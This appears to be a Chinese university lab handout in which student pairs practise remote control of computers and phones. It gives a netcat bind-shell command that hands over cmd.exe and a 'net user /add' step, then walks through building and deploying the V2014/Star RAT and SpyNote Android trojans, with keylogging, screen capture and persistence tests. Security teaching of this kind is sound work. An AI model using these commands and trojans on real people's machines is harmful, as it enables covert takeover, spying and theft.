实验四

任务一 利用NC控制电脑

步骤一：

  在受害者的机器 （同学A） 输入下面的命令： 　　nc.exe -l -p port -e cmd.exe   进入监听模式

 

步骤二： 　　在攻击者的机器.（同学B） 输入下面的命令： 　　nc ip  port //连接victim_IP,然后得到一个shell。

 

步骤三：在shell中，利用net user 用户名 密码 /add ，添加一个用户，并在受害者的机器中使用 net user 命令进行验证。（需要截图）

 

 

 任务二 利用木马控制电脑

步骤一：攻击者的机器. （同学A） 打开V2014.exe程序或则star RAT，这两个木马功能类似。

 

 步骤二： 　　

 

 步骤三：将生成的木马可执行程序拷贝到受害者的机器，并双击运行。 

步骤四：在控制端中查看木马上线情况，并对以下功能每个进行测试和截图。 

 文件管理，尝试拷贝文件

屏幕控制，尝试获取桌面

键盘记录，尝试获取对方击键记录

会话管理，重启对方机器，查看是否能自启动上线

 会话管理，卸载对方的木马。

 

任务三 Android远控实践  

一、攻击者打开spynote软件，该软件需要先安装.netframework4.0和jdk环境。

 rekings.com

 

 二、配置并打开监听端口

  

 三、配置并生成木马

 （1）点击Build Client按钮，弹出对话框

 

 

 

 （2）配置回连IP和端口，IP地址填写运行spynote的机器IP，端口填写监听的端口号，本次填写3210端口。

 

 

 （3）配置相关属性信息。

 

 

 

 

    （4）最后点击Build按钮，在选择框中选择和spynote同处在一个文件夹中Patch-release.apk。

 

 

 

 （5）完成后，自动打开APK生成所在的文件夹。

 

 四、将木马安装在Android模拟其中。

 五、在Spynote中控制手机

 可以在spynote中看到有一台机器上线，并可以查看其基本信息。

 

 在该机器中右键，可以看到可以对该机器进行控制的功能，从中选择4个以上的项目进行实验。